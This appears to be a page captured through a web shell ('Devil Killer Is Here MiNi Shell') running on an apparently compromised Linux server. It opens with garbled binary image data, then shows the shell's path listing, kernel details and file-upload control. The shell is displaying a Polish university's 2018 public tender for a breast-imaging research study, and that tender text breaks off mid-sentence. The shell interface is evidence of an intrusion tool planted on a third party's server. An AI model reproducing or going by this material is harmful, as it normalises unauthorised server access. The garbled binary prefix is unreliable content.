JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180713/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180713/589245-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 589245-N-2018 z dnia 2018-07-13 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Uniwersytet Jagielloński - Collegium Medicum</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Przedmiotem postępowania i zamówienia jest wyłonienie Wykonawcy w zakresie przeprowadzenia w ośrodku badania naukowego Substudy_01_INNOMED_Braster_2016_01 z wykorzystaniem wyrobu medycznego Braster (TM) oraz urządzenia INVENIA (TM)ABUS oraz z wykorzystaniem urządzenia do mammografi spektralnej i tomosyntezy piersi w razie wskazań medycznych dla Uniwersytetu Jagiellońskiego -Collegium Medicum w Krakowie.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Uniwersytet Jagielloński - Collegium Medicum</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">127000040</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Św. Anny</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">12</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">31-008 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Kraków</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">małopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">12 433 27 29</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">dzp@cm-uj.krakow.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">12 398 37 01</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.dzp.cm-uj.krakow.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Uczelnia publiczna</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://www.dzp.cm-uj.krakow.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://www.dzp.cm-uj.krakow.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemnie</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Dział Zamówień Publicznych UJ CM, ul. Grzegórzecka 20, 31-531 Kraków; pokój 244</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Przedmiotem postępowania i zamówienia jest wyłonienie Wykonawcy w zakresie przeprowadzenia w ośrodku badania naukowego Substudy_01_INNOMED_Braster_2016_01 z wykorzystaniem wyrobu medycznego Braster (TM) oraz urządzenia INVENIA (TM)ABUS oraz z wykorzystaniem urządzenia do mammografi spektralnej i tomosyntezy piersi w razie wskazań medycznych dla Uniwersytetu Jagiellońskiego -Collegium Medicum w Krakowie.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">141.2713.13.2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">tylko jednej części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.Przedmiotem postępowania i zamówienia jest wyłonienie Wykonawcy w zakresie przeprowadzenia w ośrodku badania naukowego Substudy_01_INNOMED_BRASTER_2016_01 z wykorzystaniem wyrobu medycznego BRASTER(TM) oraz urządzenia INVENIA(TM) ABUS oraz z wykorzystaniem urządzenia do mammografii spektralnej i tomosyntezy piersi w razie wskazań medycznych, dla Uniwersytetu Jagiellońskiego - Collegium Medicum w Krakowie. 1.1Wykonawca zobowiązany będzie do wykonania maksymalnie 150 badań z wykorzystaniem wyrobu medycznego BRASTERTM oraz urządzenia InveniaTM ABUS do automatycznej akwizycji ultrasonograficznej 3D gruczołów piersiowych oraz urządzeń do mammografii spektralnej i tomosyntezy piersi (w razie wskazań medycznych) w ramach badania naukowego SUBSTUDY_01_INNOMED_BRASTER_2016_01 pt. "Badanie skuteczności ciekłokrystalicznej termografii kontaktowej w wykrywaniu zmian patologicznych gruczołu piersiowego kobiet w porównaniu do wybranych metod diagnostyki obrazowej raka piersi" realizowanego w ramach projektu BRASTER_UJCM pt. ,,Opracowanie innowacyjnego w skali świata urządzenia Tester BRASTER przeznaczonego do cyfrowej rejestracji obrazów termograficznych patologii gruczołu piersiowego kobiet oraz badania porównujące skuteczność urządzenia względem standardowych metod diagnostycznych raka piersi", realizowanego w ramach programu ,,INNOMED" zgodnie z umową zawartą z Narodowym Centrum Badań i Rozwoju, nr INNOMED/I/14/NCBR/2014 z dnia 16.10.2014.1.2Wykonawca w ramach realizowanych badań zobowiązany będzie do :a)zaangażowania wyszkolonego personelu celem rekrutacji pacjentów i wykonywania badań za pomocą urządzenia BRASTER(TM) i urządzenia INVENIA(TM) ABUS oraz urządzeń do mammografii spektralnej i tomosyntezy piersi (w razie wskazań medycznych);b)czuwania nad prawidłowością prowadzenia badań za pomocą wyżej wymienionych urządzeń w grupach rekrutowanych Pacjentów; c)zaangażowania osoby pełniącej funkcję Głównego badacza (1 osoba) oraz zaangażowania osób wchodzących w skład Zespołu Interpretatorów (minimum 2 osoby) składającego się z: Kierownika Zespołu Interpretatorów oraz Członka/ów Zespołu Interpretatorów, a następnie zapewnienia opisania wyników wykonanych badań obrazowych; przy czym wymaga się, aby w ramach umowy o pracę zatrudnione były co najmniej dwie z wyżej wymienionych osób zaangażowanych w realizację przedmiotu zamówienia;d)zapewnienia należytego wprowadzenia przez Głównego Badacza i Zespół interpretatorów wyników badań na platformę eCRF oraz do systemu telemedycznego;e)przekazania Zamawiającemu kompletnych wyników badań za pomocą platformy eCRF.f)przekazywania Zamawiającemu raportów miesięcznych dotyczących liczby zrekrutowanych i przebadanych pacjentek, informowania Zamawiającego na piśmie o wszelkich czynnościach podejmowanych przez Wykonawcę, mających lub mogących mieć wpływ na terminową realizację przedmiotu zamówienia lub uzgodnione warunki wykonania przedmiotu umowy;g)Wykonawca zobowiązany będzie do niezwłocznego przekazania Zamawiającemu kopii wszystkich dokumentów, przygotowanych, wysłanych, złożonych lub otrzymanych w ramach wykonywania zobowiązań, w szczególności:wniosków składanych do właściwych komisji bioetycznych oraz odpowiednich organów, urzędów i organizacji.decyzji, opinii i innych dokumentów otrzymanych od właściwych komisji bioetycznych oraz odpowiednich organów, urzędów i organizacji.h)Wykonawca, na żądanie pisemne lub mailowe Zamawiającego, w każdym czasie w terminie 4 dni roboczych udzieli Zamawiającemu informacji o przebiegu realizacji zamówienia. W szczególności Zamawiający może zwrócić się do Wykonawcy o przygotowanie sprawozdania z wykonanych czynności. W takim przypadku Wykonawca przedstawi przedmiotowe pisemne sprawozdanie w terminie nieprzekraczającym 7 dni kalendarzowych od dnia zgłoszenia żądania.1.3Badanie musi być prowadzone w ośrodku dysponującym odpowiednim zapleczem sprzętowym, tj. z wykorzystaniem wyrobu medycznego BRASTER(TM) w liczbie 1 sztuka oraz urządzenia INVENIA(TM) ABUS w liczbie 1 sztuka oraz urządzeń/a do wykonywania mammografii spektralnej i tomosyntezy piersi w ilości 1 sztuka (opisanych w Załączniku nr 1 do umowy - Szczegółowy Opis Przedmiotu Zamówienia) przy udziale lekarzy/personelu odpowiednio wyszkolonych i przygotowanych do interpretacji wybranych metod diagnostycznych schorzeń piersi wykorzystanych w niniejszym badaniu.1.4Wykonawca zobowiązany jest realizować przedmiot umowy w Ośrodku spełniającym poniższe warunki:a)ma dostęp do wybranej populacji pacjentów, również z innych ośrodków (minimum 1500 pacjentów rocznie kierowanych do diagnostyki piersi oraz minimum 150 nowotworów pierwotnych piersi rocznie);b)pomieszczenie w ośrodku, w którym będzie realizowane badanie, jest klimatyzowane;c)w ośrodku możliwa jest realizacja protokołu badania;d)ośrodek dysponuje odpowiednią infrastrukturą, tj. zapleczem lokalowym;e)ośrodek dysponuje odpowiednim sprzętem oraz aparaturą niezbędna do przeprowadzenia badania (wyrób medyczny BRASTERTM wraz z niezbędnym wyposażeniem oraz aparat InveniaTM ABUS wraz z oprogramowaniem oraz urządzenie/a do mammografii spektralnej i tomosyntezy piersi);f)w pomieszczeniu jest dostęp do WiFi (minimalna prędkość 1 Mb/s);g)ośrodek dysponuje pomieszczeniem niezbędnym do przechowywania dokumentacji badania;h)ośrodek posiada własne Standardowe Procedury Postępowania dotyczące prowadzenia badań naukowych.1.5Wykonawca zobowiązany jest realizować przedmiot umowy za pomocą niżej wymienionych urządzeń:a)urządzenie BRASTER (TM) - (1 szt.): to wyrób medyczny klasy IIa, aktywny, nieinwazyjny i przeznaczony do wielokrotnego użytku termograficzny tester kontaktowy do wczesnego wykrywania patologii termicznych, a w szczególności raka piersi u kobiet, wykorzystujący technologię pasywnych matryc ciekłokrystalicznych, umieszczonych w głowicy rejestrującej obraz termograficzny gruczołów piersiowych po przyłożeniu tej matrycy do badanego narządu; urządzenie jest łatwe i intuicyjne w użyciu. Od strony metodologicznej BRASTER(TM) pozwala na wstępne różnicowanie ujawnionych anomalii termicznych ze względu na skojarzone z nimi procesy patofizjologiczne b)urządzenie INVENIA (TM) ABUS - (1 szt.): to urządzenie służące do automatycznej akwizycji ultrasonograficznej 3D gruczołów piersiowych. InveniaTM ABUS (Automated Breast Ultrasound System) to niewytwarzający promieniowania jonizacyjnego aparat uzupełniający diagnostykę przesiewową o trójwymiarowe obrazy ultrasonograficzne szczególnie przydatny u kobiet ze stwierdzoną wysoką gęstością tkanki piersi. Trójwymiarowe, wieloprzekrojowe obrazy pozwalają na dokładną, nieinwazyjną ocenę stadium nowotworu i zaplanowanie zabiegu interwencyjnego dzięki wizualizacji całej tkanki piersi. Obrazy uzyskane za pomocą stacji do obrazowania piersi InveniaTM ABUS są przesyłane do stacji roboczej InveniaTM ABUS do interpretacji, co pozwala na szybki odczyt, a następnie zapis na dysku, w systemie PACS lub na nośniku zewnętrznym. Aparat wyświetla objętości 3D w postaci 2-milimetrowych przekrojów w płaszczyźnie czołowej, w kierunku od tkanki skóry do klatki piersiowej.c)urządzenie/a do wykonywania mammografii spektralnej - (1 szt.)*: to urządzenie do wykonywania mammografii spektralnej opiera się na badaniu mammograficznym. W badaniu tym podaje się jodowe środki kontrastowe i wykorzystuje się zależność tłumienia promieniowania rentgenowskiego w zależności od rodzaju substancji zawartych w badanej piersi, szczególnie tkanek miękkich i jodu. Wykonywane są obrazy w akwizycji niskoenergetycznej i akwizycji wysokoenergetycznej. Przez połączenie obrazów niskoenergetycznych i wysokoenergetycznych utworzony zostaje pojedynczy obraz przedstawiający wrażenia rozmieszczenia środka kontrastowego w całej piersi z podkreśleniem unaczynienia zmiany chorobowej. W badaniu tym wykorzystane jest zjawisko subtrakcji, podobnie jak w przypadku rezonansu magnetycznego (MRI). W końcowym efekcie do uzyskania obrazu rozmieszczenia środka kontrastowego niezbędne jest cyfrowe przetwarzanie obrazów. Opisana procedura jest szybka, jednak całkowita dawka promieniowania rentgenowskiego jest wyższa niż dawka dla standardowego badania mammograficznego. Dużą zaletą badania jest możliwość potwierdzenia lub wykluczenia w stosunkowo krótkim czasie wieloogniskowości raka piersi.d)urządzenie do wykonywania tomosyntezy piersi - (1 szt.)*: to urządzenie do wykonywania tomosyntezy piersi również opiera się na badaniu mammograficznym. Podczas badania urządzenie prześwietla pierś milimetr po milimetrze, wykonywana jest seria zdjęć piersi pod różnymi kątami. Obrazy te są następnie użyte do wygenerowania serii cienkich (1-milimetrowych) warstw, przeglądanych jako zrekonstruowany obraz piersi. W obrazach z tomosyntezą, w porównaniu do obrazów tradycyjnych mammografów 2D, można identyfikować poszczególne struktury, eliminując problem nakładania się ich na siebie. Powstałe obrazy można dowolnie przetwarzać, uzyskując bardzo precyzyjny obraz struktury piersi. Można wykonywać zbliżenia, oddalać oraz powiększać wybrane fragmenty przez co dokładniej oceniać granicę ewentualnych zmian, a przede wszystkim ich lokalizację przestrzenną. Tomosynteza pozwala również na precyzyjne wyłapanie i ocenienie drobnych mikrozwapnień przy jednoczesnym zastosowaniu niskich dawek promieniowania.* Dopuszcza się w przypadku sprzętu wymienionego w pkt. c, d, aby Wykonawca dysponował 1 urządzeniem, pod warunkiem że będzie ono spełniać cel i funkcje urządzeń opisanych przez Zamawiającego w punktach c i dW przypadku braku realizacji przedmiotu umowy sprzętem, o którym mowa w pkt. 1.5, Wykonawca zapłaci Zamawiającemu karę umowną określoną we wzorze umowy.1.6Wykonawca skieruje do realizacji przedmiotu umowy: Głównego badacza oraz osoby wchodzące w skład Zespołu interpretatorów, tj.: Kierownika Zespołu oraz minimum jednego Członka Zespołu do realizacji zamówienia posiadające kwalifikacje zawodowe, doświadczenie niezbędne do wykonywania przedmiotu umowy, a także zobowiązany będzie do zatrudnienia co najmniej dwóch z wyżej wymienionych osób w ramach umowy o pracę na czas trwania realizacji przedmiotu umowy. Wymagania dotyczące Zespołu zawarte zostały w pkt. 5) SIWZ natomiast zakres zadań za które odpowiadać będą osoby wyznaczone do pełnienia wyżej wymienionych funkcji zawarte są w pkt. 3)2 SIWZ.1.7Liczba Uczestników Badania wynosi maksymalnie 150 pacjentek podzielonych na 3 kohorty. Szczegółowy opis zastosowanego podziału Uczestników Badania zawarty został w Załączniku Nr 1 do SIWZ - Szczegółowy Opis Przedmiotu Zamówienia (SOPZ).1.8Zamawiający dopuszcza możliwość dokonania zmiany liczebności Uczestników badania w poszczególnych grupach pod warunkiem, że liczba Uczestników Badania oraz łączna cena za wykonanie badania nie przekroczy maksymalnej kwoty brutto umowy. Zamawiający zobowiązany będzie do poinformowania Wykonawcy o zmianach liczebności grup w terminie 7 dni roboczych od momentu podjęcia decyzji przez Zamawiającego o takiej zmianie. 1.9Przedmiot zamówienia został w sposób szczegółowy opisany w SOPZ, tj. w Załączniku nr 1 do SIWZ oraz Streszczeniu protokołu badania stanowiącym integralną część SIWZ. 1.10Zamawiający nie dopuszcza składania ofert częściowych.1.11Zamawiający nie dopuszcza składania ofert wariantowych.2.Wymagania, o których mowa w art. 29 ust. 3a ustawy Prawo zamówień publicznych dotyczące wymogu zatrudnienia osób na umowę o pracę w rozumieniu przepisów ustawy z dnia 26.06.1974r. Kodeks pracy (tj. Dz.U. z 2018 poz. 917):2.1Zamawiający wymaga, aby 